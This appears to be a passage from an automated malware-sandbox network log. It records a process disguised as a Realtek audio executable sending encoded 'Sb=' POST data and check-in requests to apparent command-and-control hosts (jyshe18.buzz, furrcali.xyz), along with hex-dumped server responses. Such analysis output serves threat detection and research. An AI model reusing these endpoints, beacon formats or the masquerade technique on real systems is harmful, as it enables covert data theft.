                                                                                        Vary: Accept-Encoding
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vkjmG8UsPJHwvfHe4uV3DhV4U00Aypw6rZm89zhMAk490g97Ar5zMwCglmW%2BgTUxlS2%2FongBfEddAO3UM0xGS7YM2udV3iGodScaXUqZPaarsvJ1ZIbBOFSOFeqI0bU5qSZ6"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8f109c7ffd54458d-ATL
                                                                                        Content-Encoding: gzip
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=114362&min_rtt=114362&rtt_var=57181&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=644&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                        Data Raw: 32 36 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac d4 4f 6b 13 41 14 00 f0 fb 7e 8a 21 97 24 07 67 89 39 58 4c 13 51 cf 45 82 82 e7 c9 ee 4b 32 ed 76 66 33 33 9b 4d ea 06 3c 28 a6 7f d4 16 7a 50 69 c1 8a d0 1e 24 0a 12 2a 62 f4 cb b8 f9 73 f2 2b c8 6c 36 35 84 2d 86 d2 cb b2 fb de be 79 6f 7f 33 ec aa b4 04 75 15 52 6d 17 8a 29 05 2d 65 ae 93 26 99 46 53 25 03 21 84 6a dc 07 ab 4e 54 26 5b 88 9e ab 1e b3 14 e5 6c 2e 81 9e 44 19 84 9a 44 20 8f a0 22 62 a4 49 6b 44 71 81 3d 09 e2 6e 0d 98 2a cc bd 43 e5 63 a0 2d ca 50 11 79 04 53 66 43 eb 41 35 93 5e a3 96 e0 6b 20 25 b0 1a 88 74 16 95 d0 8d dc ac ce 34 d1 f0 cd e7 f0 67 ef f7 af 93 61 ff f5 f8 b4 1b be 3d 8b 73 b4 8a 32 b3 35 f5 34 3e 65 36 f7 b1 c3 2d a2 47 c5 75 01 55 54 44 e9 ba 52 ae bc 6d 9a 92 2a c0 d4 cd e5 57 b0 c5 37 4d df f7 f1 7a 5b d6 21 b7 82 2b de d6 56 ba a0 bb 4d 5b 8d cf bf 8e 07 9f e2 3e 1d 63 7a 5d 35 a7 44 25 63 75 29 c1 46 c3 71 1a 09 80 71 fc 0a 7e 51 e5 02 5f b9 7c 4f 70 5f 5e 22 57 2e 27 ab 45 2b fd 0f 6d 59 b3 72 f9 7a bc 3c 22 [TRUNCATED]
                                                                                        Data Ascii: 26eOkA~!$g9XLQEK2vf33M<(zPi$*bs+l65-yo3uRm)-e&FS%!jNT&[l.DD "bIkDq=n*Cc-PySfCA5^k %t4ga=s254>e6-GuUTDRm*W7Mz[!+VM[>cz]5D%cu)Fqq~Q_|Op_^"W.'E+mYrz<"6xE/K>ew/U[d\@K=7%$ 7\X9AV0[pj>T[;.C(lu &eX
                                                                                        Dec 12, 2024 21:54:44.703843117 CET172INData Raw: 54 99 8b c6 59 3d a0 f6 dd de 1d 1e 7d 1f 1d 9e 0d bb e7 7f 7e ec 4d 5e bc 0c 7b ef c2 fd 83 b0 fb 25 4e 6d 77 47 83 83 f0 f8 e9 65 c4 a9 98 b8 0d 12 e7 b1 e5 70 cf ae 3a 44 00 75 23 ea bc 6d 46 7b 8c dd ba 7b 67 d1 3d 55 30 3a 08 1c 09 d3 61 46
                                                                                        Data Ascii: TY=}~M^{%NmwGep:Du#mF{{g=U0:aFauiF=Ir!y?nO0pbb0R#
                                                                                        Dec 12, 2024 21:54:44.703854084 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        10192.168.11.2049725172.67.131.144807500C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 12, 2024 21:54:47.060172081 CET664OUTPOST /1lpi/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 219
                                                                                        Connection: close
                                                                                        Host: www.jyshe18.buzz
                                                                                        Origin: http://www.jyshe18.buzz
                                                                                        Referer: http://www.jyshe18.buzz/1lpi/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Data Raw: 53 62 3d 61 4d 53 46 4f 74 34 36 67 50 45 6d 49 54 7a 46 62 58 50 49 30 58 56 75 78 47 79 34 69 6d 79 33 54 76 50 46 76 52 39 4b 6d 79 4a 6f 42 55 55 43 44 70 39 31 66 79 6c 75 39 53 56 2b 68 65 6c 71 6f 6a 62 52 35 76 72 42 73 72 33 73 49 6c 45 77 44 52 32 35 33 33 78 31 70 77 37 45 51 4b 6e 58 4f 36 67 4a 47 44 6a 42 78 74 46 55 61 2b 65 50 31 56 55 43 51 78 30 46 30 68 73 38 65 55 62 79 51 44 77 68 67 4e 6f 6c 32 6f 2b 50 69 5a 79 2f 38 6a 72 56 37 2b 46 47 4d 76 58 4f 5a 4e 4e 53 4d 6e 37 75 70 6a 58 4a 31 43 76 57 52 69 66 45 34 63 61 57 76 75 52 6a 65 72 53 50 4d 77 4e 36 32 4f 54 6d 77 4c 5a 57 44 37 44 4e 57 4a 4a 54 42 52 36 69 41 5a 55 3d
                                                                                        Data Ascii: Sb=aMSFOt46gPEmITzFbXPI0XVuxGy4imy3TvPFvR9KmyJoBUUCDp91fylu9SV+helqojbR5vrBsr3sIlEwDR2533x1pw7EQKnXO6gJGDjBxtFUa+eP1VUCQx0F0hs8eUbyQDwhgNol2o+PiZy/8jrV7+FGMvXOZNNSMn7upjXJ1CvWRifE4caWvuRjerSPMwN62OTmwLZWD7DNWJJTBR6iAZU=
                                                                                        Dec 12, 2024 21:54:47.372967005 CET1289INHTTP/1.1 404 Not Found
                                                                                        Date: Thu, 12 Dec 2024 20:54:47 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zGPAKatVayDWW2tuxyE0EaGsDim7WGXINAyc9a47woTnljPaT%2BzxI0XWCqUm5Pzh2j8GqbQN%2FKkAe6cABmUraYefNm1%2BNMlsUp%2BlmgP6qZpX4e%2BITbO3rW7X3j4AdW4azIjP"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8f109c907b856779-ATL
                                                                                        Content-Encoding: gzip
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=114143&min_rtt=114143&rtt_var=57071&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=664&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                        Data Raw: 32 36 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac d4 4f 6b 13 41 14 00 f0 fb 7e 8a 21 97 24 07 67 89 39 58 4c 13 51 cf 45 82 82 e7 c9 ee 4b 32 ed 76 66 33 33 9b 4d ea 06 3c 28 a6 7f d4 16 7a 50 69 c1 8a d0 1e 24 0a 12 2a 62 f4 cb b8 f9 73 f2 2b c8 6c 36 35 84 2d 86 d2 cb b2 fb de be 79 6f 7f 33 ec aa b4 04 75 15 52 6d 17 8a 29 05 2d 65 ae 93 26 99 46 53 25 03 21 84 6a dc 07 ab 4e 54 26 5b 88 9e ab 1e b3 14 e5 6c 2e 81 9e 44 19 84 9a 44 20 8f a0 22 62 a4 49 6b 44 71 81 3d 09 e2 6e 0d 98 2a cc bd 43 e5 63 a0 2d ca 50 11 79 04 53 66 43 eb 41 35 93 5e a3 96 e0 6b 20 25 b0 1a 88 74 16 95 d0 8d dc ac ce 34 d1 f0 cd e7 f0 67 ef f7 af 93 61 ff f5 f8 b4 1b be 3d 8b 73 b4 8a 32 b3 35 f5 34 3e 65 36 f7 b1 c3 2d a2 47 c5 75 01 55 54 44 e9 ba 52 ae bc 6d 9a 92 2a c0 d4 cd e5 57 b0 c5 37 4d df f7 f1 7a 5b d6 21 b7 82 2b de d6 56 ba a0 bb 4d 5b 8d cf bf 8e 07 9f e2 3e 1d 63 7a 5d 35 a7 44 25 63 75 29 c1 46 c3 71 1a 09 80 71 fc 0a 7e 51 e5 02 5f b9 7c 4f 70 5f 5e 22 57 2e 27 ab 45 2b fd 0f 6d 59 b3 72 f9 7a bc 3c 22 [TRUNCATED]
                                                                                        Data Ascii: 264OkA~!$g9XLQEK2vf33M<(zPi$*bs+l65-yo3uRm)-e&FS%!jNT&[l.DD "bIkDq=n*Cc-PySfCA5^k %t4ga=s254>e6-GuUTDRm*W7Mz[!+VM[>cz]5D%cu)Fqq~Q_|Op_^"W.'E+mYrz<"6xE/K>ew/U[d\@K=7%$ 7\X9AV0[pj>T[;.C(lu
                                                                                        Dec 12, 2024 21:54:47.372980118 CET168INData Raw: 26 65 d4 a4 58 81 54 99 8b c6 59 3d a0 f6 dd de 1d 1e 7d 1f 1d 9e 0d bb e7 7f 7e ec 4d 5e bc 0c 7b ef c2 fd 83 b0 fb 25 4e 6d 77 47 83 83 f0 f8 e9 65 c4 a9 98 b8 0d 12 e7 b1 e5 70 cf ae 3a 44 00 75 23 ea bc 6d 46 7b 8c dd ba 7b 67 d1 3d 55 30 3a
                                                                                        Data Ascii: &eXTY=}~M^{%NmwGep:Du#mF{{g=U0:aFauiF=Ir!y?nO0pbb
                                                                                        Dec 12, 2024 21:54:47.372992039 CET20INData Raw: 61 0d 0a 03 00 b7 30 52 23 cb 05 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: a0R#0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        11192.168.11.2049726172.67.131.144807500C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 12, 2024 21:54:49.703917980 CET2578OUTPOST /1lpi/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 7367
                                                                                        Connection: close
                                                                                        Host: www.jyshe18.buzz
                                                                                        Origin: http://www.jyshe18.buzz
                                                                                        Referer: http://www.jyshe18.buzz/1lpi/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Data Raw: 53 62 3d 61 4d 53 46 4f 74 34 36 67 50 45 6d 49 54 7a 46 62 58 50 49 30 58 56 75 78 47 79 34 69 6d 79 33 54 76 50 46 76 52 39 4b 6d 78 70 6f 42 6a 38 43 44 4f 52 31 4e 69 6c 75 68 43 56 2f 68 65 6c 6e 6f 6a 44 56 35 76 6e 52 73 70 66 73 4b 47 63 77 42 6b 61 35 38 33 78 31 6d 51 37 5a 4f 36 6e 43 4f 35 49 4e 47 44 7a 42 78 74 46 55 61 34 79 50 38 6b 55 43 53 78 30 47 6a 52 73 67 4a 45 62 4b 51 44 6f 78 67 4f 46 51 33 5a 65 50 69 35 69 2f 76 67 44 56 34 65 46 59 4a 76 58 2f 5a 4e 42 7a 4d 6e 6e 59 70 69 6a 6a 31 44 6e 57 51 6b 71 31 69 64 32 63 37 6f 74 32 56 4b 65 71 46 44 64 50 37 4e 50 46 77 74 38 2b 4e 4f 72 46 59 4a 46 6a 64 55 75 39 57 2b 4a 4e 7a 42 37 43 34 4d 65 48 5a 4d 38 53 32 31 35 70 48 6a 4a 43 53 70 47 66 39 69 79 4a 64 75 73 32 33 45 32 47 49 58 63 68 30 7a 2f 30 73 4d 5a 49 6c 48 67 76 32 54 75 38 41 50 34 57 73 64 39 75 79 38 4e 2f 79 44 4c 50 68 41 2b 6f 69 4b 6e 66 7a 57 50 63 2f 47 2f 51 2b 56 68 76 63 55 33 45 38 73 65 5a 66 6c 35 35 45 48 43 78 54 35 62 74 78 6a 59 52 33 41 6f [TRUNCATED]
                                                                                        Data Ascii: Sb=aMSFOt46gPEmITzFbXPI0XVuxGy4imy3TvPFvR9KmxpoBj8CDOR1NiluhCV/helnojDV5vnRspfsKGcwBka583x1mQ7ZO6nCO5INGDzBxtFUa4yP8kUCSx0GjRsgJEbKQDoxgOFQ3ZePi5i/vgDV4eFYJvX/ZNBzMnnYpijj1DnWQkq1id2c7ot2VKeqFDdP7NPFwt8+NOrFYJFjdUu9W+JNzB7C4MeHZM8S215pHjJCSpGf9iyJdus23E2GIXch0z/0sMZIlHgv2Tu8AP4Wsd9uy8N/yDLPhA+oiKnfzWPc/G/Q+VhvcU3E8seZfl55EHCxT5btxjYR3AoSprl4bQVT2xQbxi9GxyzK2RGy6pjiO/9ncrJzRuYHSldu97MZHCa+0VuoUnltCG21ZF1GVXNfD0vIsT77eGkwT8VgRPPq8WETD8ue7pt6w3YrORVlt95goFVpHE6fysKUnHWhl10AHb4HO79tDKvS/gncqmxG17D/mhCM9RM95J2ZeTtVC3xInScEhKmUFbwK19ODQeqO3pojvf3KI29uY9IdJmkU+h9sGoMMk5+Uvhh9Km6rDKPo6RhTCazby2KpCsFr2IBZfVcRaBUAWUIfMLd6uyRTqBbtEOAge/6Ez8NMZmUoKoJu3yh99DtlLuFETMY5iDOZLayvRouQ7N1wVD54ONQuHSh96ltOlZLy+6rNHXWzVwrsNfbOgjC6M3ffi50mT3NDpD0Nlsv3elUa2rKQ4xsHymIMBVLNNNwMARHi5s0pNNepLdbmTBg742f32Ua896K0GDE48Uoaol2OVRUvjZWvYWigb9a7LLXSma1iCO0/zHl/PJF4Zx6UtNztkwy4uPtu49Qm0e+v/y0Ck+iNbPOQ6/Rwk4BRGj0NBVEfDkfRcrl6klYrSNhMXYjBSZNueeKTCT7psGBvtbE8zrd9I6H0UPx04tKCqMoHYbLGdg4T6xkJHjnEGw8CUI4aY63IUqLp5o0zlOLuCA7CvAqH7AAOob2k2 [TRUNCATED]
                                                                                        Dec 12, 2024 21:54:49.704006910 CET5235OUTData Raw: 2b 38 46 53 53 46 73 59 52 4a 43 53 59 4a 6f 75 73 2f 30 64 54 73 33 78 46 32 36 75 2f 48 65 64 76 6e 66 4e 78 78 79 44 78 7a 47 69 2b 6f 63 53 2b 32 35 2f 6a 44 56 6e 48 59 51 71 34 46 6a 42 31 6c 4b 43 78 39 64 48 44 6d 55 6a 46 53 59 43 4e 58
                                                                                        Data Ascii: +8FSSFsYRJCSYJous/0dTs3xF26u/HedvnfNxxyDxzGi+ocS+25/jDVnHYQq4FjB1lKCx9dHDmUjFSYCNXWCzlFP6hFSO7yPEzy2eSsz7Pfv6zaWe32YaAqma+BBl41kFyL7yHqwjD70dp/AZlaE5gvAG3Zi8rB/s9Rs0AVh1vzeL0f1lr7dBSQg/pdKEWkyV6cV4HU5Qs/5lvf+DCnx6lTKQt0dqIDTgNKEocau+Xco6xPooKL
                                                                                        Dec 12, 2024 21:54:50.001415014 CET1289INHTTP/1.1 404 Not Found
                                                                                        Date: Thu, 12 Dec 2024 20:54:49 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uhkTHG0vo2tToDRsDyedsxOKWpjoIDytBbyVL%2B5CGF8Z9inBKqLqzHsVfHJVcki5b1hTU3urTNEGCPOvqwMIdJw2kgLVB4oT7WK8rt0Y%2FezmUG%2Bu1nRdToxAaetPoHPCoD48"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8f109ca10fc4b06f-ATL
                                                                                        Content-Encoding: gzip
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=114244&min_rtt=114244&rtt_var=57122&sent=4&recv=9&lost=0&retrans=0&sent_bytes=0&recv_bytes=7813&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                        Data Raw: 32 36 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac d4 4f 6b 13 41 14 00 f0 fb 7e 8a 21 97 24 07 67 89 39 58 4c 13 51 cf 45 82 82 e7 c9 ee 4b 32 ed 76 66 33 33 9b 4d ea 06 3c 28 a6 7f d4 16 7a 50 69 c1 8a d0 1e 24 0a 12 2a 62 f4 cb b8 f9 73 f2 2b c8 6c 36 35 84 2d 86 d2 cb b2 fb de be 79 6f 7f 33 ec aa b4 04 75 15 52 6d 17 8a 29 05 2d 65 ae 93 26 99 46 53 25 03 21 84 6a dc 07 ab 4e 54 26 5b 88 9e ab 1e b3 14 e5 6c 2e 81 9e 44 19 84 9a 44 20 8f a0 22 62 a4 49 6b 44 71 81 3d 09 e2 6e 0d 98 2a cc bd 43 e5 63 a0 2d ca 50 11 79 04 53 66 43 eb 41 35 93 5e a3 96 e0 6b 20 25 b0 1a 88 74 16 95 d0 8d dc ac ce 34 d1 f0 cd e7 f0 67 ef f7 af 93 61 ff f5 f8 b4 1b be 3d 8b 73 b4 8a 32 b3 35 f5 34 3e 65 36 f7 b1 c3 2d a2 47 c5 75 01 55 54 44 e9 ba 52 ae bc 6d 9a 92 2a c0 d4 cd e5 57 b0 c5 37 4d df f7 f1 7a 5b d6 21 b7 82 2b de d6 56 ba a0 bb 4d 5b 8d cf bf 8e 07 9f e2 3e 1d 63 7a 5d 35 a7 44 25 63 75 29 c1 46 c3 71 1a 09 80 71 fc 0a 7e 51 e5 02 5f b9 7c 4f 70 5f 5e 22 57 2e 27 ab 45 2b fd 0f 6d 59 b3 72 f9 7a bc 3c 22 [TRUNCATED]
                                                                                        Data Ascii: 26eOkA~!$g9XLQEK2vf33M<(zPi$*bs+l65-yo3uRm)-e&FS%!jNT&[l.DD "bIkDq=n*Cc-PySfCA5^k %t4ga=s254>e6-GuUTDRm*W7Mz[!+VM[>cz]5D%cu)Fqq~Q_|Op_^"W.'E+mYrz<"6xE/K>ew/U[d\@K=7%$ 7\X9AV0[pj>T[;.C(lu &e
                                                                                        Dec 12, 2024 21:54:50.001422882 CET175INData Raw: a4 58 81 54 99 8b c6 59 3d a0 f6 dd de 1d 1e 7d 1f 1d 9e 0d bb e7 7f 7e ec 4d 5e bc 0c 7b ef c2 fd 83 b0 fb 25 4e 6d 77 47 83 83 f0 f8 e9 65 c4 a9 98 b8 0d 12 e7 b1 e5 70 cf ae 3a 44 00 75 23 ea bc 6d 46 7b 8c dd ba 7b 67 d1 3d 55 30 3a 08 1c 09
                                                                                        Data Ascii: XTY=}~M^{%NmwGep:Du#mF{{g=U0:aFauiF=Ir!y?nO0pbb0R#
                                                                                        Dec 12, 2024 21:54:50.001427889 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        12192.168.11.2049727172.67.131.144807500C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 12, 2024 21:54:52.340471029 CET382OUTGET /1lpi/?Hsa=KVXAK1dJ22EyzD&Sb=XO6lNaUCtrQGcU2USTPm7AFH+ym41S/sd9ytkxpugSckEiM1CKodZjEVrjBa4PsrlwO68eKRpavYImQlE0qw0gJ/mieYbLr4KLMXJAig3t9gV+Ck/1h1VB8= HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Connection: close
                                                                                        Host: www.jyshe18.buzz
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Dec 12, 2024 21:54:52.635255098 CET1289INHTTP/1.1 404 Not Found
                                                                                        Date: Thu, 12 Dec 2024 20:54:52 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jL0PyhODxy6Fr61CEDETv2y59VTQ%2Bem1yMLVQ4TI2bz0nTaW7beyGx0ZebIfVRIIZ%2B3ricxGs4EYK6a6eaSEYo2TZf78c6hplFvuNeasVijOKxAVdyBagJiGKBaHQOK4MvoQ"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8f109cb17e74135f-ATL
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=114349&min_rtt=114349&rtt_var=57174&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=382&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                        Data Raw: 35 63 62 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 67 6f 77 65 63 68 61 74 28 29 3b 0a 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 67 6f 77 65 63 68 61 74 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 75 61 20 3d 20 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 3b 0a 20 20 20 20 20 20 76 61 72 20 69 73 57 65 69 78 69 6e 20 3d 20 75 61 2e 69 6e 64 65 78 4f 66 28 27 4d 69 63 72 6f 4d 65 73 73 65 6e 67 65 72 27 29 20 3e 20 2d 31 3b 0a 20 20 20 20 20 20 2f 2f 20 e6 98 af e5 be ae e4 bf a1 e6 b5 8f e8 a7 88 e5 99 a8 0a 20 20 20 20 20 20 69 66 20 28 69 73 57 65 69 78 69 6e 29 20 7b 0a 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 20 27 68 74 74 70 73 3a 2f 2f 73 69 74 65 2e 69 70 31 33 38 2e 63 6f 6d 2f 77 77 77 2e 6a 79 73 68 65 31 38 2e 62 75 7a 7a 27 3b 20 2f 2f 20 e5 be ae e4 bf a1 e8 b7 b3 e8 bd ac 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 [TRUNCATED]
                                                                                        Data Ascii: 5cb<script type="text/javascript"> gowechat(); function gowechat() { var ua = navigator.userAgent; var isWeixin = ua.indexOf('MicroMessenger') > -1; // if (isWeixin) {window.location.href = 'https://site.ip138.com/www.jyshe18.buzz'; // } }</script><script type="text/javascript"> goqqllq(); function goqqllq() { var ua = navigator.userAgent; var isqqllq = ua.indexOf('QQBrowser') >
                                                                                        Dec 12, 2024 21:54:52.635380983 CET1009INData Raw: 2d 31 3b 0a 20 20 20 20 20 20 2f 2f 20 e6 98 af 51 51 e6 b5 8f e8 a7 88 e5 99 a8 0a 20 20 20 20 20 20 69 66 20 28 69 73 71 71 6c 6c 71 29 20 7b 0a 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 20 27 68 74 74 70 3a 2f 2f 73 69
                                                                                        Data Ascii: -1; // QQ if (isqqllq) {window.location.href = 'http://site.ip138.com/www.jyshe18.buzz'; // QQ } }</script><script type="text/javascript"> goquark(); function goquark() { var ua = naviga
                                                                                        Dec 12, 2024 21:54:52.635396004 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        13192.168.11.2049728103.106.67.112807500C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 12, 2024 21:54:58.019175053 CET644OUTPOST /86f0/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 199
                                                                                        Connection: close
                                                                                        Host: www.furrcali.xyz
                                                                                        Origin: http://www.furrcali.xyz
                                                                                        Referer: http://www.furrcali.xyz/86f0/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Data Raw: 53 62 3d 43 73 69 43 6e 68 6c 45 59 38 41 6c 2b 50 45 79 32 41 49 45 48 38 73 57 5a 56 59 42 66 42 78 74 6b 47 6b 75 52 72 49 72 6a 63 4b 55 4e 61 65 56 4b 71 61 33 51 6c 4f 58 74 79 38 30 6b 53 76 51 44 76 49 50 47 74 54 39 4b 5a 72 35 4a 4c 31 59 55 53 63 31 64 51 30 33 69 6e 75 66 48 57 52 50 5a 75 69 6a 4a 67 68 42 63 53 50 49 6a 61 41 57 6a 39 54 59 77 43 65 75 42 4a 48 38 63 4d 62 76 44 6b 77 35 41 75 4c 7a 4e 4f 38 68 4e 56 71 49 72 74 58 79 75 34 76 4e 37 79 6d 5a 51 6d 63 75 69 53 36 34 48 32 63 48 79 78 70 6c 5a 37 67 6e 30 6c 6d 52 6c 47 48 38 35 65 51 46 63 51 2b 50 57 51 3d 3d
                                                                                        Data Ascii: Sb=CsiCnhlEY8Al+PEy2AIEH8sWZVYBfBxtkGkuRrIrjcKUNaeVKqa3QlOXty80kSvQDvIPGtT9KZr5JL1YUSc1dQ03inufHWRPZuijJghBcSPIjaAWj9TYwCeuBJH8cMbvDkw5AuLzNO8hNVqIrtXyu4vN7ymZQmcuiS64H2cHyxplZ7gn0lmRlGH85eQFcQ+PWQ==
                                                                                        Dec 12, 2024 21:54:58.180129051 CET204INHTTP/1.1 404 Not Found
                                                                                        Server: Dynamic Http Server
                                                                                        X-Ratelimit-Limit: 101
                                                                                        X-Ratelimit-Remaining: 100
                                                                                        X-Ratelimit-Reset: 1
                                                                                        Date: Thu, 12 Dec 2024 20:54:58 GMT
                                                                                        Content-Length: 0
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        14192.168.11.2049729103.106.67.112807500C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 12, 2024 21:55:00.712104082 CET664OUTPOST /86f0/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 219
                                                                                        Connection: close
                                                                                        Host: www.furrcali.xyz
                                                                                        Origin: http://www.furrcali.xyz
                                                                                        Referer: http://www.furrcali.xyz/86f0/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Data Raw: 53 62 3d 43 73 69 43 6e 68 6c 45 59 38 41 6c 76 66 30 79 31 68 49 45 51 73 73 58 46 6c 59 42 47 52 78 70 6b 47 67 75 52 71 4d 37 6b 71 61 55 4e 2f 69 56 4c 76 75 33 63 46 4f 58 35 69 38 78 37 69 76 50 44 76 46 73 47 73 76 39 4b 5a 58 35 4a 4c 6c 59 55 6c 49 79 63 41 30 31 38 48 75 42 4e 32 52 50 5a 75 69 6a 4a 67 31 37 63 52 2f 49 6b 75 38 57 6a 63 54 62 7a 43 65 74 52 5a 48 38 4b 38 62 7a 44 6b 78 55 41 76 6e 4a 4e 4d 45 68 4e 55 61 49 72 34 6a 78 6c 34 76 4c 6d 69 6e 4d 65 33 4e 36 72 68 57 31 4c 47 59 6a 74 44 35 76 56 4e 74 39 70 58 53 31 6d 56 62 4f 39 75 70 74 65 53 2f 55 4c 52 38 5a 50 66 32 37 6b 74 53 4d 56 68 30 4a 4b 63 76 33 34 5a 67 3d
                                                                                        Data Ascii: Sb=CsiCnhlEY8Alvf0y1hIEQssXFlYBGRxpkGguRqM7kqaUN/iVLvu3cFOX5i8x7ivPDvFsGsv9KZX5JLlYUlIycA018HuBN2RPZuijJg17cR/Iku8WjcTbzCetRZH8K8bzDkxUAvnJNMEhNUaIr4jxl4vLminMe3N6rhW1LGYjtD5vVNt9pXS1mVbO9upteS/ULR8ZPf27ktSMVh0JKcv34Zg=
                                                                                        Dec 12, 2024 21:55:00.871450901 CET204INHTTP/1.1 404 Not Found
